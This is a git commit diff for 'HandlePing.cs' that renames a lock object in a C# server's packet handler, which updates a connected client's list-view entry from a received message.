Update HandlePing.cs

This commit is contained in:
NYAN CAT 2019-09-02 08:02:35 +03:00
parent c6303fc8f4
commit f0dacd6ee6

View File

@ -12,7 +12,7 @@ namespace Server.Handle_Packet
try
{
lock (Settings.Listview1Lock)
lock (Settings.LockListviewClients)
if (client.LV != null)
client.LV.SubItems[Program.form1.lv_prefor.Index].Text = unpack_msgpack.ForcePathObject("Message").AsString;
else